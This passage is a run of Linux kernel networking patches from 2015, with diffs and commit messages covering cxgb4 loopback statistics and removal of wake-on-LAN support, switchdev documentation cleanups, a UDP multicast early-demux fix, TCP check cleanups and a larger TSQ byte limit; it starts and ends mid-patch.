loopback_stats_strings[][ETH_GSTRING_LEN] = { + "-------Loopback----------- ", + "octets_ok ", + "frames_ok ", + "bcast_frames ", + "mcast_frames ", + "ucast_frames ", + "error_frames ", + "frames_64 ", + "frames_65_to_127 ", + "frames_128_to_255 ", + "frames_256_to_511 ", + "frames_512_to_1023 ", + "frames_1024_to_1518 ", + "frames_1519_to_max ", + "frames_dropped ", + "bg0_frames_dropped ", + "bg1_frames_dropped ", + "bg2_frames_dropped ", + "bg3_frames_dropped ", + "bg0_frames_trunc ", + "bg1_frames_trunc ", + "bg2_frames_trunc ", + "bg3_frames_trunc ", +}; + static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: return ARRAY_SIZE(stats_strings) + ARRAY_SIZE(adapter_stats_strings) + - ARRAY_SIZE(channel_stats_strings); + ARRAY_SIZE(channel_stats_strings) + + ARRAY_SIZE(loopback_stats_strings); default: return -EOPNOTSUPP; } @@ -216,6 +243,9 @@ static void get_strings(struct net_device *dev, u32 stringset, u8 *data) data += sizeof(adapter_stats_strings); memcpy(data, channel_stats_strings, sizeof(channel_stats_strings)); + data += sizeof(channel_stats_strings); + memcpy(data, loopback_stats_strings, + sizeof(loopback_stats_strings)); } } @@ -380,6 +410,9 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, { struct port_info *pi = netdev_priv(dev); struct adapter *adapter = pi->adapter; + struct lb_port_stats s; + int i; + u64 *p0; t4_get_port_stats_offset(adapter, pi->tx_chan, (struct port_stats *)data, @@ -394,7 +427,15 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, *data++ = (u64)pi->port_id; collect_channel_stats(adapter, (struct channel_stats *)data, pi->port_id); + data += sizeof(struct channel_stats) / sizeof(u64); + + *data++ = (u64)pi->port_id; + memset(&s, 0, sizeof(s)); + t4_get_lb_stats(adapter, pi->port_id, &s); + p0 = &s.octets; + for (i = 0; i < ARRAY_SIZE(loopback_stats_strings) - 1; i++) + *data++ = (unsigned long long)*p0++; } static void get_regs(struct net_device *dev, struct ethtool_regs *regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e8bfe6f0dd7c..c95714ea1444 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4263,6 +4263,54 @@ void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p) #undef GET_STAT_COM } +/** + * t4_get_lb_stats - collect loopback port statistics + * @adap: the adapter + * @idx: the loopback port index + * @p: the stats structure to fill + * + * Return HW statistics for the given loopback port. + */ +void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p) +{ + u32 bgmap = t4_get_mps_bg_map(adap, idx); + +#define GET_STAT(name) \ + t4_read_reg64(adap, \ + (is_t4(adap->params.chip) ? \ + PORT_REG(idx, MPS_PORT_STAT_LB_PORT_##name##_L) : \ + T5_PORT_REG(idx, MPS_PORT_STAT_LB_PORT_##name##_L))) +#define GET_STAT_COM(name) t4_read_reg64(adap, MPS_STAT_##name##_L) + + p->octets = GET_STAT(BYTES); + p->frames = GET_STAT(FRAMES); + p->bcast_frames = GET_STAT(BCAST); + p->mcast_frames = GET_STAT(MCAST); + p->ucast_frames = GET_STAT(UCAST); + p->error_frames = GET_STAT(ERROR); + + p->frames_64 = GET_STAT(64B); + p->frames_65_127 = GET_STAT(65B_127B); + p->frames_128_255 = GET_STAT(128B_255B); + p->frames_256_511 = GET_STAT(256B_511B); + p->frames_512_1023 = GET_STAT(512B_1023B); + p->frames_1024_1518 = GET_STAT(1024B_1518B); + p->frames_1519_max = GET_STAT(1519B_MAX); + p->drop = GET_STAT(DROP_FRAMES); + + p->ovflow0 = (bgmap & 1) ? GET_STAT_COM(RX_BG_0_LB_DROP_FRAME) : 0; + p->ovflow1 = (bgmap & 2) ? GET_STAT_COM(RX_BG_1_LB_DROP_FRAME) : 0; + p->ovflow2 = (bgmap & 4) ? GET_STAT_COM(RX_BG_2_LB_DROP_FRAME) : 0; + p->ovflow3 = (bgmap & 8) ? GET_STAT_COM(RX_BG_3_LB_DROP_FRAME) : 0; + p->trunc0 = (bgmap & 1) ? GET_STAT_COM(RX_BG_0_LB_TRUNC_FRAME) : 0; + p->trunc1 = (bgmap & 2) ? GET_STAT_COM(RX_BG_1_LB_TRUNC_FRAME) : 0; + p->trunc2 = (bgmap & 4) ? GET_STAT_COM(RX_BG_2_LB_TRUNC_FRAME) : 0; + p->trunc3 = (bgmap & 8) ? GET_STAT_COM(RX_BG_3_LB_TRUNC_FRAME) : 0; + +#undef GET_STAT +#undef GET_STAT_COM +} + /** * t4_wol_magic_enable - enable/disable magic packet WoL * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index 3273a4c67e84..af3462db5adb 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -1605,6 +1605,7 @@ #define MPS_PORT_STAT_LB_PORT_1519B_MAX_L 0x520 #define MPS_PORT_STAT_LB_PORT_1519B_MAX_H 0x524 #define MPS_PORT_STAT_LB_PORT_DROP_FRAMES 0x528 +#define MPS_PORT_STAT_LB_PORT_DROP_FRAMES_L 0x528 #define MPS_PORT_STAT_RX_PORT_BYTES_L 0x540 #define MPS_PORT_STAT_RX_PORT_BYTES_H 0x544 #define MPS_PORT_STAT_RX_PORT_FRAMES_L 0x548 From e2d14b42c25cb765df07d585a919b8c1c8b82e78 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:42 +0530 Subject: [PATCH 679/872] cxgb4: Remove WOL get/set ethtool support Remove ethtool get/set support for wake on lan, adapter doesn't support it. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 2 - .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 33 ------ drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 100 ------------------ drivers/net/ethernet/chelsio/cxgb4/t4_hw.h | 2 - 4 files changed, 137 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 9aab32e8c38a..bf2b822d0e8e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -732,8 +732,6 @@ struct adapter { struct cxgb4_virt_res vres; unsigned int swintr; - unsigned int wol; - struct { unsigned short vec; char desc[IFNAMSIZ + 10]; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 36f6ff2648b3..0194c91a0486 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -947,37 +947,6 @@ static int set_flash(struct net_device *netdev, struct ethtool_flash *ef) return ret; } -#define WOL_SUPPORTED (WAKE_BCAST | WAKE_MAGIC) -#define BCAST_CRC 0xa0ccc1a6 - -static void get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) -{ - wol->supported = WAKE_BCAST | WAKE_MAGIC; - wol->wolopts = netdev2adap(dev)->wol; - memset(&wol->sopass, 0, sizeof(wol->sopass)); -} - -static int set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) -{ - int err = 0; - struct port_info *pi = netdev_priv(dev); - - if (wol->wolopts & ~WOL_SUPPORTED) - return -EINVAL; - t4_wol_magic_enable(pi->adapter, pi->tx_chan, - (wol->wolopts & WAKE_MAGIC) ? dev->dev_addr : NULL); - if (wol->wolopts & WAKE_BCAST) { - err = t4_wol_pat_enable(pi->adapter, pi->tx_chan, 0xfe, ~0ULL, - ~0ULL, 0, false); - if (!err) - err = t4_wol_pat_enable(pi->adapter, pi->tx_chan, 1, - ~6ULL, ~0ULL, BCAST_CRC, true); - } else { - t4_wol_pat_enable(pi->adapter, pi->tx_chan, 0, 0, 0, 0, false); - } - return err; -} - static u32 get_rss_table_size(struct net_device *dev) { const struct port_info *pi = netdev_priv(dev); @@ -1107,8 +1076,6 @@ static const struct ethtool_ops cxgb_ethtool_ops = { .get_ethtool_stats = get_stats, .get_regs_len = get_regs_len, .get_regs = get_regs, - .get_wol = get_wol, - .set_wol = set_wol, .get_rxnfc = get_rxnfc, .get_rxfh_indir_size = get_rss_table_size, .get_rxfh = get_rss_table, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index c95714ea1444..c21ab2686a69 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -4311,106 +4311,6 @@ void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p) #undef GET_STAT_COM } -/** - * t4_wol_magic_enable - enable/disable magic packet WoL - * @adap: the adapter - * @port: the physical port index - * @addr: MAC address expected in magic packets, %NULL to disable - * - * Enables/disables magic packet wake-on-LAN for the selected port. - */ -void t4_wol_magic_enable(struct adapter *adap, unsigned int port, - const u8 *addr) -{ - u32 mag_id_reg_l, mag_id_reg_h, port_cfg_reg; - - if (is_t4(adap->params.chip)) { - mag_id_reg_l = PORT_REG(port, XGMAC_PORT_MAGIC_MACID_LO); - mag_id_reg_h = PORT_REG(port, XGMAC_PORT_MAGIC_MACID_HI); - port_cfg_reg = PORT_REG(port, XGMAC_PORT_CFG2_A); - } else { - mag_id_reg_l = T5_PORT_REG(port, MAC_PORT_MAGIC_MACID_LO); - mag_id_reg_h = T5_PORT_REG(port, MAC_PORT_MAGIC_MACID_HI); - port_cfg_reg = T5_PORT_REG(port, MAC_PORT_CFG2_A); - } - - if (addr) { - t4_write_reg(adap, mag_id_reg_l, - (addr[2] << 24) | (addr[3] << 16) | - (addr[4] << 8) | addr[5]); - t4_write_reg(adap, mag_id_reg_h, - (addr[0] << 8) | addr[1]); - } - t4_set_reg_field(adap, port_cfg_reg, MAGICEN_F, - addr ? MAGICEN_F : 0); -} - -/** - * t4_wol_pat_enable - enable/disable pattern-based WoL - * @adap: the adapter - * @port: the physical port index - * @map: bitmap of which HW pattern filters to set - * @mask0: byte mask for bytes 0-63 of a packet - * @mask1: byte mask for bytes 64-127 of a packet - * @crc: Ethernet CRC for selected bytes - * @enable: enable/disable switch - * - * Sets the pattern filters indicated in @map to mask out the bytes - * specified in @mask0/@mask1 in received packets and compare the CRC of - * the resulting packet against @crc. If @enable is %true pattern-based - * WoL is enabled, otherwise disabled. - */ -int t4_wol_pat_enable(struct adapter *adap, unsigned int port, unsigned int map, - u64 mask0, u64 mask1, unsigned int crc, bool enable) -{ - int i; - u32 port_cfg_reg; - - if (is_t4(adap->params.chip)) - port_cfg_reg = PORT_REG(port, XGMAC_PORT_CFG2_A); - else - port_cfg_reg = T5_PORT_REG(port, MAC_PORT_CFG2_A); - - if (!enable) { - t4_set_reg_field(adap, port_cfg_reg, PATEN_F, 0); - return 0; - } - if (map > 0xff) - return -EINVAL; - -#define EPIO_REG(name) \ - (is_t4(adap->params.chip) ? \ - PORT_REG(port, XGMAC_PORT_EPIO_##name##_A) : \ - T5_PORT_REG(port, MAC_PORT_EPIO_##name##_A)) - - t4_write_reg(adap, EPIO_REG(DATA1), mask0 >> 32); - t4_write_reg(adap, EPIO_REG(DATA2), mask1); - t4_write_reg(adap, EPIO_REG(DATA3), mask1 >> 32); - - for (i = 0; i < NWOL_PAT; i++, map >>= 1) { - if (!(map & 1)) - continue; - - /* write byte masks */ - t4_write_reg(adap, EPIO_REG(DATA0), mask0); - t4_write_reg(adap, EPIO_REG(OP), ADDRESS_V(i) | EPIOWR_F); - t4_read_reg(adap, EPIO_REG(OP)); /* flush */ - if (t4_read_reg(adap, EPIO_REG(OP)) & SF_BUSY_F) - return -ETIMEDOUT; - - /* write CRC */ - t4_write_reg(adap, EPIO_REG(DATA0), crc); - t4_write_reg(adap, EPIO_REG(OP), ADDRESS_V(i + 32) | EPIOWR_F); - t4_read_reg(adap, EPIO_REG(OP)); /* flush */ - if (t4_read_reg(adap, EPIO_REG(OP)) & SF_BUSY_F) - return -ETIMEDOUT; - } -#undef EPIO_REG - - t4_set_reg_field(adap, PORT_REG(port, XGMAC_PORT_CFG2_A), 0, PATEN_F); - return 0; -} - /* t4_mk_filtdelwr - create a delete filter WR * @ftid: the filter ID * @wr: the filter work request to populate diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h index 88067d90121c..f9a2cb164737 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h @@ -52,8 +52,6 @@ enum { MBOX_LEN = 64, /* mailbox size in bytes */ TRACE_LEN = 112, /* length of trace data and mask */ FILTER_OPT_LEN = 36, /* filter tuple width for optional components */ - NWOL_PAT = 8, /* # of WoL patterns */ - WOL_PAT_LEN = 128, /* length of WoL patterns */ }; enum { From f5ed2febda3ae51cc382a1341381506cec09248b Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:40 -0700 Subject: [PATCH 680/872] switchdev: documentation: fix longer-than-80-char lines Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 36 +++++++++++++------------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 616f89267d23..5061d6e12e2f 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -114,11 +114,11 @@ would be sub-port 0 on port 1 on switch 1. Switch ID ^^^^^^^^^ -The switchdev driver must implement the switchdev op switchdev_port_attr_get for -SWITCHDEV_ATTR_PORT_PARENT_ID for each port netdev, returning the same physical ID -for each port of a switch. The ID must be unique between switches on the same -system. The ID does not need to be unique between switches on different -systems. +The switchdev driver must implement the switchdev op switchdev_port_attr_get +for SWITCHDEV_ATTR_PORT_PARENT_ID for each port netdev, returning the same +physical ID for each port of a switch. The ID must be unique between switches +on the same system. The ID does not need to be unique between switches on +different systems. The switch ID is used to locate ports on a switch and to know if aggregated ports belong to the same switch. @@ -194,11 +194,11 @@ in turn, will notify the bridge driver using the switchdev notifier call: err = call_switchdev_notifiers(val, dev, info); -Where val is SWITCHDEV_FDB_ADD when learning and SWITCHDEV_FDB_DEL when forgetting, and -info points to a struct switchdev_notifier_fdb_info. On SWITCHDEV_FDB_ADD, the bridge -driver will install the FDB entry into the bridge's FDB and mark the entry as -NTF_EXT_LEARNED. The iproute2 bridge command will label these entries -"offload": +Where val is SWITCHDEV_FDB_ADD when learning and SWITCHDEV_FDB_DEL when +forgetting, and info points to a struct switchdev_notifier_fdb_info. On +SWITCHDEV_FDB_ADD, the bridge driver will install the FDB entry into the +bridge's FDB and mark the entry as NTF_EXT_LEARNED. The iproute2 bridge +command will label these entries "offload": $ bridge fdb 52:54:00:12:35:01 dev sw1p1 master br0 permanent @@ -229,18 +229,18 @@ the bridge's FDB. It's possible, but not optimal, to enable learning on the device port and on the bridge port, and disable learning_sync. To support learning and learning_sync port attributes, the driver implements -switchdev op switchdev_port_attr_get/set for SWITCHDEV_ATTR_PORT_BRIDGE_FLAGS. The driver -should initialize the attributes to the hardware defaults. +switchdev op switchdev_port_attr_get/set for SWITCHDEV_ATTR_PORT_BRIDGE_FLAGS. +The driver should initialize the attributes to the hardware defaults. FDB Ageing ^^^^^^^^^^ There are two FDB ageing models supported: 1) ageing by the device, and 2) ageing by the kernel. Ageing by the device is preferred if many FDB entries -are supported. The driver calls call_switchdev_notifiers(SWITCHDEV_FDB_DEL, ...) to -age out the FDB entry. In this model, ageing by the kernel should be turned -off. XXX: how to turn off ageing in kernel on a per-port basis or otherwise -prevent the kernel from ageing out the FDB entry? +are supported. The driver calls call_switchdev_notifiers(SWITCHDEV_FDB_DEL, +...) to age out the FDB entry. In this model, ageing by the kernel should be +turned off. XXX: how to turn off ageing in kernel on a per-port basis or +otherwise prevent the kernel from ageing out the FDB entry? In the kernel ageing model, the standard bridge ageing mechanism is used to age out stale FDB entries. To keep an FDB entry "alive", the driver should refresh @@ -262,8 +262,8 @@ STP State Change on Port Internally or with a third-party STP protocol implementation (e.g. mstpd), the bridge driver maintains the STP state for ports, and will notify the switch -driver of STP state change on a port using the switchdev op switchdev_attr_port_set for -SWITCHDEV_ATTR_PORT_STP_UPDATE. +driver of STP state change on a port using the switchdev op +switchdev_attr_port_set for SWITCHDEV_ATTR_PORT_STP_UPDATE. State is one of BR_STATE_*. The switch driver can use STP state updates to update ingress packet filter list for the port. For example, if port is From d290f1fc7092814ee0e14b80ad09b06af7bd3484 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:41 -0700 Subject: [PATCH 681/872] switchdev: documentation: fix grammer error Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 5061d6e12e2f..0554b68e1fab 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -142,7 +142,7 @@ The port netdevs representing the physical switch ports can be organized into higher-level switching constructs. The default construct is a standalone router port, used to offload L3 forwarding. Two or more ports can be bonded together to form a LAG. Two or more ports (or LAGs) can be bridged to bridge -to L2 networks. VLANs can be applied to sub-divide L2 networks. L2-over-L3 +L2 networks. VLANs can be applied to sub-divide L2 networks. L2-over-L3 tunnels can be built on ports. These constructs are built using standard Linux tools such as the bridge driver, the bonding/team drivers, and netlink-based tools such as iproute2. From 4b5364fbdce7e4b947e6e76d7341675ea2e12f4d Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:42 -0700 Subject: [PATCH 682/872] switchdev: documentation: for static FDB ops, use switchdev_port_fdb_xxx ops Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 0554b68e1fab..00c703ce6903 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -177,6 +177,10 @@ entries are installed, for example, using iproute2 bridge cmd: bridge fdb add ADDR dev DEV [vlan VID] [self] +The driver should use the helper switchdev_port_fdb_xxx ops for ndo_fdb_xxx +ops, and handle add/delete/dump of SWITCHDEV_OBJ_PORT_FDB object using +switchdev_port_obj_xxx ops. + XXX: what should be done if offloading this rule to hardware fails (for example, due to full capacity in hardware tables) ? From 7616dcbb212eeec00c9bcc0fecb953fdee60634c Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:43 -0700 Subject: [PATCH 683/872] switchdev: documentation: use switchdev_port_obj_xxx for IPv4 FIB add/modify/delete ops Clarify in documentation and code that IPV4 FIB add operation is used for both adding a new FIB entry to the device and for modifying an existing FIB entry on the device. Also, remove left-over references to ipv4_fib ops and replace with details on SWITCHDEV_PORT_IPV4_FIB object. Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 53 ++++++++++++++------------ net/switchdev/switchdev.c | 4 +- 2 files changed, 31 insertions(+), 26 deletions(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 00c703ce6903..da82cd75a4f6 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -300,33 +300,38 @@ IGMP Snooping XXX: complete this section -L3 routing ----------- +L3 Routing Offload +------------------ Offloading L3 routing requires that device be programmed with FIB entries from the kernel, with the device doing the FIB lookup and forwarding. The device does a longest prefix match (LPM) on FIB entries matching route prefix and -forwards the packet to the matching FIB entry's nexthop(s) egress ports. To -program the device, the switchdev driver is called with add/delete ops for IPv4 -and IPv6 FIB entries. For IPv4, the driver implements switchdev ops: - - int (*switchdev_fib_ipv4_add)(struct net_device *dev, - __be32 dst, int dst_len, - struct fib_info *fi, - u8 tos, u8 type, - u32 nlflags, u32 tb_id); - - int (*switchdev_fib_ipv4_del)(struct net_device *dev, - __be32 dst, int dst_len, - struct fib_info *fi, - u8 tos, u8 type, - u32 tb_id); - -to add/delete IPv4 dst/dest_len prefix on table tb_id. The *fi structure holds -details on the route and route's nexthops. *dev is one of the port netdevs -mentioned in the routes next hop list. If the output port netdevs referenced -in the route's nexthop list don't all have the same switch ID, the driver is -not called to add/delete the FIB entry. +forwards the packet to the matching FIB entry's nexthop(s) egress ports. + +To program the device, the driver implements support for +SWITCHDEV_OBJ_IPV[4|6]_FIB object using switchdev_port_obj_xxx ops. +switchdev_port_obj_add is used for both adding a new FIB entry to the device, +or modifying an existing entry on the device. + +XXX: Currently, only SWITCHDEV_OBJ_IPV4_FIB objects are supported. + +SWITCHDEV_OBJ_IPV4_FIB object passes: + + struct switchdev_obj_ipv4_fib { /* IPV4_FIB */ + u32 dst; + int dst_len; + struct fib_info *fi; + u8 tos; + u8 type; + u32 nlflags; + u32 tb_id; + } ipv4_fib; + +to add/modify/delete IPv4 dst/dest_len prefix on table tb_id. The *fi +structure holds details on the route and route's nexthops. *dev is one of the +port netdevs mentioned in the routes next hop list. If the output port netdevs +referenced in the route's nexthop list don't all have the same switch ID, the +driver is not called to add/modify/delete the FIB entry. Routes offloaded to the device are labeled with "offload" in the ip route listing: @@ -344,7 +349,7 @@ listing: 12.0.0.4 via 11.0.0.9 dev sw1p2 proto zebra metric 20 offload 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.15 -XXX: add/del IPv6 FIB API +XXX: add/mod/del IPv6 FIB API Nexthop Resolution ^^^^^^^^^^^^^^^^^^ diff --git a/net/switchdev/switchdev.c b/net/switchdev/switchdev.c index ac853acbe211..e008057dab46 100644 --- a/net/switchdev/switchdev.c +++ b/net/switchdev/switchdev.c @@ -803,7 +803,7 @@ static struct net_device *switchdev_get_dev_by_nhs(struct fib_info *fi) } /** - * switchdev_fib_ipv4_add - Add IPv4 route entry to switch + * switchdev_fib_ipv4_add - Add/modify switch IPv4 route entry * * @dst: route's IPv4 destination address * @dst_len: destination address length (prefix length) @@ -813,7 +813,7 @@ static struct net_device *switchdev_get_dev_by_nhs(struct fib_info *fi) * @nlflags: netlink flags passed in (NLM_F_*) * @tb_id: route table ID * - * Add IPv4 route entry to switch device. + * Add/modify switch IPv4 route entry. */ int switchdev_fib_ipv4_add(u32 dst, int dst_len, struct fib_info *fi, u8 tos, u8 type, u32 nlflags, u32 tb_id) From 6e540309326188f769e03bb4c6dd8ff6752930c2 Mon Sep 17 00:00:00 2001 From: Shawn Bohrer Date: Wed, 3 Jun 2015 16:27:38 -0500 Subject: [PATCH 684/872] ipv4/udp: Verify multicast group is ours in upd_v4_early_demux() 421b3885bf6d56391297844f43fb7154a6396e12 "udp: ipv4: Add udp early demux" introduced a regression that allowed sockets bound to INADDR_ANY to receive packets from multicast groups that the socket had not joined. For example a socket that had joined 224.168.2.9 could also receive packets from 225.168.2.9 despite not having joined that group if ip_early_demux is enabled. Fix this by calling ip_check_mc_rcu() in udp_v4_early_demux() to verify that the multicast packet is indeed ours. Signed-off-by: Shawn Bohrer Reported-by: Yurij M. Plotnikov Signed-off-by: David S. Miller --- net/ipv4/udp.c | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c index 1c92ea67baef..83aa604f9273 100644 --- a/net/ipv4/udp.c +++ b/net/ipv4/udp.c @@ -90,6 +90,7 @@ #include #include #include +#include #include #include #include @@ -1960,6 +1961,7 @@ void udp_v4_early_demux(struct sk_buff *skb) struct sock *sk; struct dst_entry *dst; int dif = skb->dev->ifindex; + int ours; /* validate the packet */ if (!pskb_may_pull(skb, skb_transport_offset(skb) + sizeof(struct udphdr))) @@ -1969,14 +1971,24 @@ void udp_v4_early_demux(struct sk_buff *skb) uh = udp_hdr(skb); if (skb->pkt_type == PACKET_BROADCAST || - skb->pkt_type == PACKET_MULTICAST) + skb->pkt_type == PACKET_MULTICAST) { + struct in_device *in_dev = __in_dev_get_rcu(skb->dev); + + if (!in_dev) + return; + + ours = ip_check_mc_rcu(in_dev, iph->daddr, iph->saddr, + iph->protocol); + if (!ours) + return; sk = __udp4_lib_mcast_demux_lookup(net, uh->dest, iph->daddr, uh->source, iph->saddr, dif); - else if (skb->pkt_type == PACKET_HOST) + } else if (skb->pkt_type == PACKET_HOST) { sk = __udp4_lib_demux_lookup(net, uh->dest, iph->daddr, uh->source, iph->saddr, dif); - else + } else { return; + } if (!sk) return; From 12e25e1041d044d4204f2b7c54695e14e8ffb282 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 3 Jun 2015 23:49:21 -0700 Subject: [PATCH 685/872] tcp: remove redundant checks tcp_v4_rcv() checks the following before calling tcp_v4_do_rcv(): if (th->doff < sizeof(struct tcphdr) / 4) goto bad_packet; if (!pskb_may_pull(skb, th->doff * 4)) goto discard_it; So following check in tcp_v4_do_rcv() is redundant and "goto csum_err;" is wrong anyway. if (skb->len < tcp_hdrlen(skb) || ...) goto csum_err; A second check can be removed after no_tcp_socket label for same reason. Same tests can be removed in tcp_v6_do_rcv() Note : short tcp frames are not properly accounted in tcpInErrs MIB, because pskb_may_pull() failure simply drops incoming skb, we might fix this in a separate patch. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- net/ipv4/tcp_ipv4.c | 4 ++-- net/ipv6/tcp_ipv6.c | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index feb875769b8d..3130c42240c8 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -1400,7 +1400,7 @@ int tcp_v4_do_rcv(struct sock *sk, struct sk_buff *skb) return 0; } - if (skb->len < tcp_hdrlen(skb) || tcp_checksum_complete(skb)) + if (tcp_checksum_complete(skb)) goto csum_err; if (sk->sk_state == TCP_LISTEN) { @@ -1647,7 +1647,7 @@ int tcp_v4_rcv(struct sk_buff *skb) if (!xfrm4_policy_check(NULL, XFRM_POLICY_IN, skb)) goto discard_it; - if (skb->len < (th->doff << 2) || tcp_checksum_complete(skb)) { + if (tcp_checksum_complete(skb)) { csum_error: TCP_INC_STATS_BH(net, TCP_MIB_CSUMERRORS); bad_packet: diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index 7be3d858cbf0..b72e1ffc6bb4 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -1250,7 +1250,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb) return 0; } - if (skb->len < tcp_hdrlen(skb) || tcp_checksum_complete(skb)) + if (tcp_checksum_complete(skb)) goto csum_err; if (sk->sk_state == TCP_LISTEN) { @@ -1442,7 +1442,7 @@ static int tcp_v6_rcv(struct sk_buff *skb) tcp_v6_fill_cb(skb, hdr, th); - if (skb->len < (th->doff<<2) || tcp_checksum_complete(skb)) { + if (tcp_checksum_complete(skb)) { csum_error: TCP_INC_STATS_BH(net, TCP_MIB_CSUMERRORS); bad_packet: From c39c4c6abb89d24454b63798ccbae12b538206a5 Mon Sep 17 00:00:00 2001 From: Wei Liu Date: Wed, 3 Jun 2015 11:10:42 +0100 Subject: [PATCH 686/872] tcp: double default TSQ output bytes limit Xen virtual network driver has higher latency than a physical NIC. Having only 128K as limit for TSQ introduced 30% regression in guest throughput. This patch raises the limit to 256K. This reduces the regression to 8%. This buys us more time to work out a proper solution in the long run. Signed-off-by: Wei Liu Cc: David Miller Cc: Eric Dumazet Acked-by: Eric Dumazet Signed-off-by: David S. Miller --- net/ipv4/tcp_output.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 190538a2a88c..eeb59befaf06 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -50,8 +50,8 @@ int sysctl_tcp_retrans_collapse __read_mostly = 1; */ int sysctl_tcp_workaround_signed_windows __read_mostly = 0; -/* Default TSQ limit of two TSO segments */ -int sysctl_tcp_limit_output_bytes __read_mostly = 131072; +/* Default TSQ limit of four TSO segments */ +int sysctl_tcp_limit_output_bytes __read_mostly = 262144; /* This limits the percentage of the congestion window which we * will allow a single TSO frame to consume. Building TSO frames From 2e5356da370e36ba7aab39d2800c7a2412630ae7 Mon Sep 17 00:00:00 2001 From: Arun Siluvery Date: Tue, 2 Jun 2015 20:06:59 +0100 Subject: [PATCH 687/872] drm/i915: Initialize HWS page address after GPU reset MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit After GPU reset, HW is losing the address of HWS page in the register. The page itself is valid except that HW is not aware of its location. [ 64.368623] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 64.368655] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 64.368681] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 